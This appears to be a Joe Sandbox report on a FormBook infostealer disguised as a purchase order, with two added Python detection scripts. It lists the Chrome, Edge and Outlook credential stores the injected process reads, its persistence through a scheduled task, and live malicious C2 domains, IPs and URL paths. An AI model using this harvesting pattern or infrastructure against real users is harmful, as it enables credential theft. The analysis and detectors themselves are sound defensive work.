Source: Yara match | File source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\setupugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
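The accesses above are the stealer's credential harvest seen from the file system: a Windows binary under SysWOW64 (setupugc.exe, running injected code) opens the Chrome and Edge profile stores directly instead of going through the browser, and enumerates the Outlook MAPI profile key. The following is an added example, not code from the report or from the malware, showing a minimal detection that flags those reads whenever the acting process is not the owning application. The event records and PIDs are constructed to mirror the report; the owner table assumes default browser install paths.

```python
"""Flag reads of browser credential stores and the Outlook MAPI profile
key by processes other than the owning application.

Added example; the SAMPLE_EVENTS records are constructed, and the
BROWSER_OWNERS / MAIL_OWNERS tables are assumptions about default installs."""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Files a FormBook-style stealer reads straight from the profile directory.
# "Local State" holds the DPAPI-wrapped key that decrypts the values stored
# in "Login Data" and "Cookies", which is why it is requested alongside them.
CREDENTIAL_STORE_NAMES = {"cookies", "login data", "web data", "local state"}

# Registry path of Outlook/MAPI profiles (stored mail account secrets).
MAPI_PROFILES_KEY = (
    r"software\microsoft\windows nt\currentversion"
    r"\windows messaging subsystem\profiles"
)

# Profile-directory marker -> process names entitled to read it.
# Assumption: default installs; extend for per-user or enterprise paths.
BROWSER_OWNERS = {
    r"\google\chrome\user data": {"chrome.exe"},
    r"\microsoft\edge\user data": {"msedge.exe"},
}
MAIL_OWNERS = {"outlook.exe"}  # assumption: only Outlook reads its profiles


@dataclass(frozen=True)
class Event:
    pid: int
    image: str    # full path of the process performing the access
    kind: str     # "file_open" or "key_open"
    target: str   # file path or registry key


def owning_processes(path):
    """Process names entitled to read this browser profile path, or None."""
    low = path.lower()
    for marker, owners in BROWSER_OWNERS.items():
        if marker in low:
            return owners
    return None


def is_credential_store(path):
    return PureWindowsPath(path).name.lower() in CREDENTIAL_STORE_NAMES


def evaluate(events):
    """Return (pid, image, target, reason) for each suspicious access."""
    alerts = []
    for ev in events:
        actor = PureWindowsPath(ev.image).name.lower()
        if ev.kind == "file_open" and is_credential_store(ev.target):
            owners = owning_processes(ev.target)
            if owners is not None and actor not in owners:
                alerts.append((ev.pid, ev.image, ev.target,
                               "browser credential store opened by foreign process"))
        elif ev.kind == "key_open" and MAPI_PROFILES_KEY in ev.target.lower():
            if actor not in MAIL_OWNERS:
                alerts.append((ev.pid, ev.image, ev.target,
                               "MAPI profile key opened by non-mail process"))
    return alerts


# Constructed events (PIDs are placeholders). The first three mirror the
# report; the last two are benign controls that must not alert.
SAMPLE_EVENTS = [
    Event(5432, r"C:\Windows\SysWOW64\setupugc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(5432, r"C:\Windows\SysWOW64\setupugc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    Event(5432, r"C:\Windows\SysWOW64\setupugc.exe", "key_open",
          r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
          r"\Windows Messaging Subsystem\Profiles\Outlook"),
    Event(7712, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(5432, r"C:\Windows\SysWOW64\setupugc.exe", "file_open",
          r"C:\Windows\Fonts\verdana.ttf"),
]

if __name__ == "__main__":
    for pid, image, target, reason in evaluate(SAMPLE_EVENTS):
        print(f"[{pid}] {image} -> {target}: {reason}")
```

The owner check is deliberately by process name only; on a real endpoint pair it with the image's signer or full path, since a stealer can also drop itself as chrome.exe in a user-writable directory.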

            Remote Access Functionality

Source: Yara match | File source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

One line per tactic, column cells in the matrix's own order. A number in parentheses is the count of signatures mapped to that technique in this analysis; entries without a number are the unmatched cells of the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (412); Scheduled Task/Job (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (41); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (113); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1507701 | Sample: New Purchase Order.exe | Start date: 09/09/2024 | Architecture: WINDOWS | Score: 100

Network endpoints attached to the start node: www.nevsehir-nakliyat.xyz; www.theaji.shop; 19 other IPs or domains
Signatures attached to the start node: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 10 other signatures
Signature on www.nevsehir-nakliyat.xyz: Performs DNS queries to domains with low reputation

Process tree (node numbers are the graph's own; a bracketed number after a process is the graph's per-process count, see the legend above; "injected" marks a code-injection edge rather than a process start):

10 New Purchase Order.exe [7] (started)
    dropped: C:\Users\user\AppData\Roaming\ibDqDkseW.exe, PE32; C:\Users\...\ibDqDkseW.exe:Zone.Identifier, ASCII; C:\Users\user\AppData\Local\...\tmp83A4.tmp, XML; C:\Users\...\New Purchase Order.exe.log, ASCII
    signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    16 New Purchase Order.exe (started)
        signatures: Maps a DLL or memory area into another process
        31 kdFPsEWDpy.exe (injected)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            44 setupugc.exe (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                47 kdFPsEWDpy.exe (injected)
                    network: sorriragora.online 162.240.81.18, ports 49779, 49780, 49781, UNIFIEDLAYER-AS-1US, United States; nosr.net 82.221.128.183, ports 49741, 80, THORDC-ASIS, Iceland; 10 other IPs or domains
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                51 firefox.exe (started)
    19 powershell.exe [23] (started)
        signatures: Loading BitLocker PowerShell Module
        34 WmiPrvSE.exe (started)
        36 conhost.exe (started)
    21 powershell.exe [23] (started)
        38 conhost.exe (started)
    23 schtasks.exe [1] (started)
        40 conhost.exe (started)
14 ibDqDkseW.exe [5] (started)
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    25 schtasks.exe [1] (started)
        42 conhost.exe (started)
    27 ibDqDkseW.exe (started)
    29 ibDqDkseW.exe (started)

| Source                 | Detection | Scanner        |
|------------------------|-----------|----------------|
| New Purchase Order.exe | 31%       | Virustotal     |
| New Purchase Order.exe | 100%      | Joe Sandbox ML |

| Source                                      | Detection | Scanner        |
|---------------------------------------------|-----------|----------------|
| C:\Users\user\AppData\Roaming\ibDqDkseW.exe | 100%      | Joe Sandbox ML |
| C:\Users\user\AppData\Roaming\ibDqDkseW.exe | 21%       | ReversingLabs  |

No Antivirus matches
| Source                     | Detection | Scanner    |
|----------------------------|-----------|------------|
| nosr.net                   | 0%        | Virustotal |
| dns.ladipage.com           | 0%        | Virustotal |
| www.complexity.pub         | 1%        | Virustotal |
| sorriragora.online         | 1%        | Virustotal |
| www.dyme.tech              | 0%        | Virustotal |
| www.sorriragora.online     | 1%        | Virustotal |
| www.lilibetmed.online      | 2%        | Virustotal |
| www.jyourwd.store          | 0%        | Virustotal |
| www.angelenterprise.biz    | 0%        | Virustotal |
| www.nevsehir-nakliyat.xyz  | 1%        | Virustotal |
| www.masteriocp.online      | 1%        | Virustotal |
| natroredirect.natrocdn.com | 0%        | Virustotal |
| www.theaji.shop            | 0%        | Virustotal |
| www.monos.shop             | 0%        | Virustotal |
| Name                       | IP              | Active  | Malicious | Reputation |
|----------------------------|-----------------|---------|-----------|------------|
| nosr.net                   | 82.221.128.183  | true    | true      | unknown    |
| angelenterprise.biz        | 3.33.130.190    | true    | true      | unknown    |
| dns.ladipage.com           | 54.179.173.60   | true    | true      | unknown    |
| www.complexity.pub         | 217.160.0.127   | true    | true      | unknown    |
| sorriragora.online         | 162.240.81.18   | true    | true      | unknown    |
| www.mbwd.store             | 103.42.108.46   | true    | true      | unknown    |
| www.fvti.cloud             | 38.55.112.70    | true    | true      | unknown    |
| www.dyme.tech              | 13.248.169.48   | true    | true      | unknown    |
| www.kryto.top              | 162.0.213.94    | true    | true      | unknown    |
| www.jyourwd.store          | 54.183.209.210  | true    | true      | unknown    |
| www.lilibetmed.online      | 185.134.245.113 | true    | true      | unknown    |
| natroredirect.natrocdn.com | 85.159.66.93    | true    | true      | unknown    |
| www.sorriragora.online     | unknown         | unknown | true      | unknown    |
| www.monos.shop             | unknown         | unknown | true      | unknown    |
| www.nosr.net               | unknown         | unknown | true      | unknown    |
| www.nevsehir-nakliyat.xyz  | unknown         | unknown | true      | unknown    |
| www.masteriocp.online      | unknown         | unknown | true      | unknown    |
| www.angelenterprise.biz    | unknown         | unknown | true      | unknown    |
| www.theaji.shop            | unknown         | unknown | true      | unknown    |
| www.terrearcenciel.online  | unknown         | unknown | true      | unknown    |
| IP              | Domain                     | Country       | ASN   | ASN Name                                    | Malicious |
|-----------------|----------------------------|---------------|-------|---------------------------------------------|-----------|
| 162.240.81.18   | sorriragora.online         | United States | 46606 | UNIFIEDLAYER-AS-1US                         | true      |
| 54.183.209.210  | www.jyourwd.store          | United States | 16509 | AMAZON-02US                                 | true      |
| 162.0.213.94    | www.kryto.top              | Canada        | 35893 | ACPCA                                       | true      |
| 13.248.169.48   | www.dyme.tech              | United States | 16509 | AMAZON-02US                                 | true      |
| 82.221.128.183  | nosr.net                   | Iceland       | 50613 | THORDC-ASIS                                 | true      |
| 217.160.0.127   | www.complexity.pub         | Germany       | 8560  | ONEANDONE-ASBrauerstrasse48DE               | true      |
| 38.55.112.70    | www.fvti.cloud             | United States | 174   | COGENT-174US                                | true      |
| 54.179.173.60   | dns.ladipage.com           | United States | 16509 | AMAZON-02US                                 | true      |
| 185.134.245.113 | www.lilibetmed.online      | Norway        | 12996 | DOMENESHOPOsloNorwayNO                      | true      |
| 103.42.108.46   | www.mbwd.store             | Australia     | 45638 | SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU | true      |
| 85.159.66.93    | natroredirect.natrocdn.com | Turkey        | 34619 | CIZGITR                                     | true      |
| 3.33.130.190    | angelenterprise.biz        | United States | 8987  | AMAZONEXPANSIONGB                           | true      |
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1507701
Start date and time: 2024-09-09 04:50:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: New Purchase Order.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@25/16@15/12
                        EGA Information:
                        • Successful, ratio: 83.3%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 142
                        • Number of non-executed functions: 307
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:50:56 | Task Scheduler | Run new task: ibDqDkseW path: C:\Users\user\AppData\Roaming\ibDqDkseW.exe
22:50:54 | API Interceptor | 1x Sleep call for process: New Purchase Order.exe modified
22:50:55 | API Interceptor | 29x Sleep call for process: powershell.exe modified
22:50:59 | API Interceptor | 1x Sleep call for process: ibDqDkseW.exe modified
22:51:55 | API Interceptor | 12466597x Sleep call for process: setupugc.exe modified
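The Task Scheduler entry in the timeline (task ibDqDkseW whose action is an executable under the user's AppData\Roaming) is the persistence pattern behind the "Scheduled temp file as task from temp location" Sigma hit. The Python below is an added example and is not part of the Joe Sandbox report: it parses Windows Security event 4698 (A scheduled task was created), pulls the Exec command out of the task XML carried in the TaskContent field, and flags actions rooted in locations a standard user can write to. The event XML, the benign task names and the "user" account are constructed for the demo; only the ibDqDkseW path is taken from the timeline.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {
    "e": "http://schemas.microsoft.com/win/2004/08/events/event",
    "t": "http://schemas.microsoft.com/windows/2004/02/mit/task",
}

# Roots a standard user can write to. A task action that lives here instead of
# Program Files / System32 is the pattern the report's timeline shows.
USER_WRITABLE_PATH = re.compile(
    r"^[A-Za-z]:\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)"
    r"|ProgramData|Windows\\Temp|Users\\Public)\\",
    re.IGNORECASE,
)
USER_WRITABLE_ENV = ("%APPDATA%", "%LOCALAPPDATA%", "%TEMP%", "%TMP%",
                     "%USERPROFILE%", "%PROGRAMDATA%", "%PUBLIC%")


def is_user_writable(command: str) -> bool:
    """True if the action path starts in a location a non-admin user can write."""
    path = command.strip().strip('"')
    if path.upper().startswith(USER_WRITABLE_ENV):
        return True
    return USER_WRITABLE_PATH.match(path) is not None


def parse_4698(event_xml: str) -> dict:
    """Extract user, task name and Exec actions from a Security 4698 event."""
    root = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    task = ET.fromstring(data["TaskContent"])  # the task definition is nested XML
    actions = [
        (
            exec_.findtext("t:Command", default="", namespaces=NS).strip(),
            exec_.findtext("t:Arguments", default="", namespaces=NS).strip(),
        )
        for exec_ in task.iter("{%s}Exec" % NS["t"])
    ]
    return {
        "user": data.get("SubjectUserName", ""),
        "task": data.get("TaskName", ""),
        "actions": actions,
    }


def suspicious_task_actions(event_xml: str) -> dict:
    """Return the parsed event plus the Exec commands rooted in user-writable dirs."""
    rec = parse_4698(event_xml)
    rec["flagged"] = [cmd for cmd, _ in rec["actions"] if is_user_writable(cmd)]
    return rec


def build_4698(task_name: str, command: str, args: str = "", user: str = "user") -> str:
    """Constructed 4698 event (demo only; real events carry many more fields)."""
    task_xml = (
        '<Task version="1.2" xmlns="%s">'
        '<Actions Context="Author"><Exec><Command>%s</Command>'
        "<Arguments>%s</Arguments></Exec></Actions></Task>"
    ) % (NS["t"], escape(command), escape(args))
    return (
        '<Event xmlns="%s"><System><EventID>4698</EventID></System><EventData>'
        '<Data Name="SubjectUserName">%s</Data>'
        '<Data Name="TaskName">\\%s</Data>'
        '<Data Name="TaskContent">%s</Data>'
        "</EventData></Event>"
    ) % (NS["e"], escape(user), escape(task_name), escape(task_xml))


SAMPLE_EVENTS = [
    # path taken from the report's timeline entry; everything else is constructed
    build_4698("ibDqDkseW", r"C:\Users\user\AppData\Roaming\ibDqDkseW.exe"),
    build_4698("Microsoft\\Windows\\Defrag\\ScheduledDefrag",
               r"%windir%\system32\defrag.exe", "-c -h -k -g -$", "SYSTEM"),
    build_4698("Updater", r"C:\Program Files\Vendor\updater.exe", "/silent"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        rec = suspicious_task_actions(ev)
        verdict = "ALERT" if rec["flagged"] else "ok"
        print(f"{verdict:5} {rec['task']} by {rec['user']}: {rec['actions']}")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled; the TaskScheduler/Operational log's event 106 records the registration but not the action, so it cannot feed this check. The writable-root list is deliberately coarse and will not see through junctions or 8.3 short names, so pair a hit with the registering account (SubjectUserName) and the signature of the target binary before alerting.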
Context: IPs (other submissions that contacted the same address)
Match / associated sample name or URL | detection | threat name | context

162.240.81.18
• DHL airwaybill # 6913321715 & BL Draft copy.exe | malicious | FormBook | www.sorriragora.online/wxmz/
• yyyyyyyy.exe | malicious | FormBook | www.bellaflory.online/ituf/?zx=TzUh&EN-hu=YEtZDn0tA7DyZih9mnEB6iyoKUlvFjNFey9C//wFiDDFSyoO5eWV3ZKTc+ZVO1r+PL1l+P0OBuxLEWCpqZjHLSt270GmuGdydD8IJidQLk1z2EFl8w==
• rfOfF6s6gI.exe | malicious | FormBook | www.agoraeubebo.com/rs2o/
• 4qV0xW2NSj.exe | malicious | FormBook | www.agoraeubebo.com/rs2o/
• MV ALIADO - S-REQ-19-00064 List items.exe | malicious | FormBook | www.7hubmt.online/xbib/
• MV ALIADO - S-REQ-19-00064.7Z.exe | malicious | FormBook | www.7hubmt.online/xbib/
• 176654 Grade B2FA, BRF-MBO2 & CX2OB.exe | malicious | FormBook | www.7hubmt.online/xbib/
• PO#86637.exe | malicious | FormBook | www.meery.store/tqpd/
• sBX8VM67ZE.exe | malicious | FormBook | www.agoraeubebo.com/niik/
• PI 30_08_2024.exe | malicious | FormBook | www.meery.store/tqpd/

54.183.209.210
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | www.jyourwd.store/6ua2/
• Filename.exe | malicious | DarkTortilla, FormBook | www.jyourwd.store/z504/

162.0.213.94
• Scan 00093847.exe | malicious | FormBook | www.kryto.top/09dt/
• Quote #011698.exe | malicious | FormBook | www.syvra.xyz/h2bb/
• PO#86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
• PO#86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
• 0XLuA614VK.exe | malicious | FormBook | www.rigintech.info/ig9u/
• RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | malicious | FormBook | www.zyfro.info/hnng/
• PO#86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
• PI 30_08_2024.exe | malicious | FormBook | www.syvra.xyz/h2bb/
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | www.kryto.top/09dt/
• factura-630.900.exe | malicious | FormBook | www.syvra.xyz/h2bb/

13.248.169.48
• OjKmJJm2YT.exe | malicious | Simda Stealer | pupydeq.com/login.php
• 5AFlyarMds.exe | malicious | Simda Stealer | pupydeq.com/login.php
• Scan 00093847.exe | malicious | FormBook | www.dyme.tech/pjne/
• uB31aJH4M0.exe | malicious | Simda Stealer | pupydeq.com/login.php
• firmware.armv4l.elf | malicious | Unknown | 13.248.169.48/
• firmware.armv5l.elf | malicious | Unknown | 13.248.169.48/
• firmware.armv7l.elf | malicious | Unknown | 13.248.169.48/
• firmware.i586.elf | malicious | Unknown | 13.248.169.48/
• firmware.i686.elf | malicious | Unknown | 13.248.169.48/
• firmware.x86_64.elf | malicious | Unknown | 13.248.169.48/
Context: domains (other submissions that resolved the same name, with the address it resolved to)
Match / associated sample name or URL | detection | threat name | context

www.dyme.tech
• Scan 00093847.exe | malicious | FormBook | 13.248.169.48
• doc330391202408011.exe | malicious | FormBook | 13.248.169.48
• PO #86637.exe | malicious | FormBook | 13.248.169.48
• REQST_PRC 410240665_2024.exe | malicious | FormBook | 13.248.169.48
• REQST_PRC 410240.exe | malicious | FormBook | 13.248.169.48
• COTIZACION 290824.exe | malicious | FormBook | 13.248.169.48
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 13.248.169.48
• INVG0088 LHV3495264 BL327291535V.exe | malicious | FormBook | 13.248.169.48
• DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 13.248.169.48
• PURCHASE ORDER_330011 SEPTEMBER 2024.exe | malicious | FormBook | 13.248.169.48

dns.ladipage.com
• Scan 00093847.exe | malicious | FormBook | 18.139.62.226
• z11SOAAUG2408.exe | malicious | FormBook | 13.228.81.39
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 13.228.81.39
• DN.exe | malicious | FormBook | 18.139.62.226
• https://www.newbalancestore.asia/nb530.nh?utm_source=sale | malicious | Unknown | 13.228.81.39
• DHL_497104778908.exe | malicious | FormBook | 18.139.62.226
• Shipping Documents 7896424100.exe | malicious | FormBook | 13.228.81.39
• INV90097.exe | malicious | FormBook | 54.179.173.60
• PRE-ALERT HTHC22031529.exe | malicious | FormBook | 54.179.173.60
• Order 81307529516.LZ.exe | malicious | FormBook | 54.179.173.60

www.complexity.pub
• Scan 00093847.exe | malicious | FormBook | 217.160.0.127
• TF1--90.AE.473- ARCA.exe | malicious | FormBook | 217.160.0.127
• PJS-4021339 IND.exe | malicious | FormBook | 217.160.0.127
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 217.160.0.127
• Tender_24910.exe | malicious | FormBook | 217.160.0.127
• Atlas Copco- WEPCO.exe | malicious | FormBook | 217.160.0.127
• SecuriteInfo.com.Trojan.AutoIt.1430.6102.4229.exe | malicious | FormBook | 217.160.0.127

www.fvti.cloud
• yyyyyyyy.exe | malicious | FormBook | 38.55.112.70
• RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | malicious | FormBook | 38.55.112.70
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 38.55.112.70

www.mbwd.store
• Scan 00093847.exe | malicious | FormBook | 103.42.108.46
• rRFQ.bat.exe | malicious | FormBook | 103.42.108.46
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 103.42.108.46
Context: ASNs (other submissions that contacted the same autonomous system, with the address contacted)
Match / associated sample name or URL | detection | threat name | context

AMAZON-02 (US)
• https://eu-central-1.protection.sophos.com/?d=convertcontacts.com&u=aHR0cDovL21haWwuY29udmVydGNvbnRhY3RzLmNvbS9scy9jbGljaz91cG49dTAwMS4tMkZPZ2p2UDZlSEpMUThnRkNaWFFWYVdwSW9wc2R3cTcyQzhaR2p0eWFDYmt1U25VYkpra2g5YTVWdUxMZ3VQcTA2OFpPX2otMkIzT0FHSFlyemxyWGM0d1dHdkFlaXYtMkZNV2VJQTlOWk9iOTc0YS0yQlpvdnAxN0l5aGZoeWdhczFXVkJvMTNESUhrNWF5eEpuSHB6ZEdzeXI3SEJ4eE9ZVGxlZHp3R090RUNYcFJad0ljUC0yRlU2Um1RMlZZRS0yQm5lNU4zUTZMTHNQNXJRNTNyZi0yQmRGVFc4bThFTlNFdGI2dWFtLTJGR3NrQ3lZQjBVQ3oxalh1elAtMkYxb3BIQmxaaEF3YWI5ZHFmcXhVb3hXU0puWlh5eS0yRmtFS2FJLTJGSUU1eUhCQS0zRC0zRA==&p=m&i=NWNiN2ZlZTg4MWQzYmMxNDQ2YTllMzg2&t=MzVESEtqZVpmK2lydmd6VlJBZ0dOd0VXaHNLamhvK21MK1pYQzM4L0JEUT0=&h=e14b286494664ef891348988c9e838b4&s=AVNPUEhUT0NFTkNSWVBUSVYoFOpcRSmtylFH3LId5iHD0shJ7qIqV8UAVy4ANYCuCYR3Alb2xoJLC7nF0vB_FDAfdi-bbhqFa2YYLKpVwPUnPTAMVQe9kqbfwYJ_E95Mtw | malicious | HTMLPhisher | 18.239.94.24
• http://onlinesecuritycheck.weebly.com/ | malicious | Unknown | 18.245.187.126
• http://subhashadapa.github.io/Netflix | malicious | HTMLPhisher | 18.244.20.179
• http://kjkesd.godaddysites.com/ | malicious | Unknown | 13.248.243.5
• http://himanshu2312.github.io/netflix-clone | malicious | HTMLPhisher | 99.81.174.244
• http://free-5480836.webadorsite.com/ | malicious | HTMLPhisher | 52.39.229.100
• http://free-5484353.webadorsite.com/ | malicious | HTMLPhisher | 54.69.50.186
• https://metetamsssklogin.webflow.io/ | malicious | Unknown | 52.222.232.144
